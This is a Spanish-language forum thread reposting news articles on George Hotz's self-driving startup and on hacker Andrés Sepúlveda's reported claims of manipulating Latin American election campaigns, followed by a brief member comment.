Chris Dixon, socio de Andreessen Horowitz, escribió que cuando conoció a Hotz por primera vez estaba escéptico. Pero eso pronto se convirtió en entusiasmo tras probar el auto y aprender más sobre la inteligencia artificial detrás de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Hotz, quien Dixon describe como "brillante", ha creado un gran impacto en Silicon Valley a lo largo de la última década.

Cuando tenía 17, descubrió una forma de hackear el iPhone para que todos los proveedores pudieran usar el dispositivo, no solo AT&T (el único proveedor que tuvo contrato inicialmente). Su alias, Geohot, se hizo legendario en los círculos de hackers. Fue al Instituto de Tecnología de Rochester pero lo dejó tras un semestre. Él hizo un internado en Google, trabajó en Facebook y fue demandado por Sony por un hackeo al Playstation 3. Tomó clases de ciencias de la computación en Carnegie Mellon, pero no obtuvo su diploma de graduado.



"Creo que la universidad potencialmente es el peor engaño de la historia", le dijo a CNNMoney.

Hotz, originario de Nueva Jersey, dijo que ha estado fascinado por mucho tiempo por la inteligencia artificial pero no estaba seguro cómo aproximarse a ella.

"Por un tiempo, pensé que sería increíblemente difícil contribuir", dijo. En enero de 2015 empezó a trabajar como investigador en Vicarious, una empresa que está construyendo algoritmos de inteligencia artificial. "Empecé a leer todos los documentos. Pensé, 'esto no es tan difícil. No es ultra-sofisticado. Esto es básico'", dijo.

Además, "los errores que la gente está cometiendo son básicos".

En julio de 2015, Hotz dejó Vicarious con miras a iniciar un trato con Elon Musk, CEO de Tesla. Y no fue sólo un sueño. Hotz conoció al ejecutivo y le propuso una nueva clase de visión de computadora para sus autos. Pero después de tres meses de conversaciones, las pláticas de contratos finalmente cesaron.

Hotz dijo que fue porque Musk quería ser capaz de pasar sobre su tecnología, incluso cuando cubría todos los requerimientos del contrato. Tesla no respondió inmediatamente a la petición de comentarios.

Ahí es cuando Hotz decidió hacerlo por sí mismo.

"Empecé a ver a los demás competidores. Estas personas son unos amateurs", dijo.

En particular, Hotz siente que General Motors fue engañado con su adquisición de 1.000 millones de dólares de la startup Cruise Automation, un kit de manejo autónomo que aún no sale a la venta.

"Ese es un precio de adquisición descabellado para una empresa que tiene tecnología que trabaja dudosamente", dijo Hotz. La inversión de Andreessen Horowit es el primer financiamiento de capital de riesgo que ha recaudado You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Hasta ahora, su tecnología ha recorrido exitosamente a lo largo de un trayecto de una hora de Mountain View a San Francisco.

El equipo de Hotz es pequeño –sólo cuatro personas– pero está contratando. Él dijo que obtiene cerca de 100 solicitudes al día de candidatos interesados.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Andrés Sepúlveda es un hacker colombiano que afirma haber manipulado campañas electorales en varios países de Latinoamérica durante los últimos ocho años. La onda expansiva del bombazo soltado por la revista Bloomberg ha sido devastadora.



Si lo que dice es cierto, este hombre es el primer eslabón de una cadena de manipulación electoral en toda la región. Andrés Sepúlveda es colombiano, lleva la cabeza rapada y es hacker de oficio. Y aunque desde mayo del 2014 se encuentra preso  en su país -por ser hallado responsable de interceptaciones ilegales a personas vinculadas al proceso de paz con las FARC- las declaraciones que dio esta semana a la revista Bloomberg Businessweek han sacudido a los gobiernos de Nicaragua, Panamá, Honduras, El Salvador, Colombia, México, Costa Rica, Guatemala y Venezuela.

Sepúlveda afirma haber viajado durante ocho años, a través del continente, a la cabeza de un equipo de hackers, manipulando las principales campañas políticas. Todo ello, mientras se encontraba trabajando para el estratega político venezolano Juan José Rendón (más conocido como JJ Rendón), aunque agrega que es posible que muchos de los candidatos que ayudó no estuvieran al tanto de sus labores ya que "sólo conoció a unos pocos".

De acuerdo a la entrevista que concedió a la revista norteamericana, la carrera del hacker colombiano comenzó el 2005 y sus primeros trabajos consistían, principalmente, en modificar sitios web de campañas y violar bases de datos de opositores con información sobre sus donantes.

Con el paso del tiempo, Sepúlveda armó un equipo que, por 12 mil dólares al mes,  espiaba, robaba y difamaba en representación de campañas presidenciales dentro de Latinomérica.

Por ocho mil dólares más, es decir por 20 mil, los "clientes" podían también elegir un "paquete premium" que incluía interceptación digital, ataque, decodificación y defensa.

Con un presupuesto de 600 mil dólares, el trabajo que dice haber realizado para la campaña del presidente Enrique Peña Nieto en las elecciones mexicanas del 2012, habría sido el más complejo: asegura haber encabezado un equipo de seis hackers que robaron estrategias de campaña, manipularon redes sociales para crear falsos sentimientos de entusiasmo y rechazo, e instalado spyware en sedes de campaña de la oposición, todo con el fin de ayudar a Peña Nieto a obtener la victoria.

El trabajo de Sepúlveda a favor de la campaña de Peña Nieto habría consistido en la interceptación de las computadoras del PRD y el PAN, incluidas las de sus respectivos candidatos presidenciales: Andrés López Obrador y Josefina Vázquez Mota.

Luego del correspondiente desmentido del gobierno de Peña Nieto, Sepúlveda ratificó -a través de su abogado: Jhon Castelblanco- que hizo labores de espionaje informático en la campaña electoral mexicana y que las pruebas que confirman su versión fueron entregadas a Bloomberg.

Según Castelblanco, algunas de esas pruebas -como copias de correos electrónicos y otras evidencias- fueron entregadas por Sepúlveda a la revista norteamericana. La conversación entre su representado y Bloomberg, dijo el abogado, se realizó el año pasado, pero todo fue corroborado por la revista antes de ser publicado.

Vida del hacker


Diferentes medios colombianos han querido dar luces sobre Andrés Sepúlveda, quien era un personaje anónimo hasta el día previo a su captura. 

Se sabe que trabajó en la campaña política de Óscar Zuluaga, ex candidato presidencial del Centro Democrático de su país y que era muy activo en la red social Twitter, donde aún se le pueden leer comentarios como  "matar es un arte que no admite sutilezas",  "sólo guiño mi ojo izquierdo para apuntar mejor", "me gusta el olor a muerte", o "Nelson Mandela, un peligroso comunista menos".

El hombre de 33 años se describe a sí mismo como un hacker "ético", aliado del ciberterrorismo y la ciberguerra, y aunque no lo señalaba directamente, se sabe que es un radical de derecha y seguidor del expresidente Álvaro Uribe.

Las razones por las que Sepúlveda ha soltado tremenda bomba aún son desconocidas. El real alcance de la onda expansiva se desconoce. Él dice que simplemente lo hizo "para tener la conciencia tranquila". (A.N.)


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, me pasó exactamente lo mismo, entre primero en la comunidad de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y no me gustó el ambiente, sin embargo, al entrar en Underc0de decidí quedarme por la gente y el buen rollo que hay.